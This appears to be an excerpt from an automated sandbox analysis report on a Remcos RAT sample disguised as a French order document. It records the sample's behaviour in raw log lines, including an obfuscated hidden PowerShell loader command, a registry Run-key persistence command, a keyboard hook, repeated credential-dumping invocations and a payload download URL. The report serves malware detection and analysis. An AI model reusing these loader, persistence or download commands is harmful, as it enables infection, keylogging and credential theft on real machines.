            Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/-
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin-_
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownHTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.6:49707 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405107

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_05C4C53D Sleep,LdrInitializeThunk,NtProtectVirtualMemory,7_2_05C4C53D
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_004049460_2_00404946
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_004062B80_2_004062B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0465F0002_2_0465F000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0465F8D02_2_0465F8D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0465ECB82_2_0465ECB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0718BB082_2_0718BB08
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054720455.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefetichdyrkerne conservatism.exe* vs Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@57/41@4/3
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440A
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile created: C:\Users\user\AppData\Local\salpetersyrefabrikkersJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4372
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess352
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6908
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6212
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5996
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6932
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile created: C:\Users\user\AppData\Local\Temp\nsi820E.tmpJump to behavior
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeVirustotal: Detection: 27%
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile read: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"Jump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
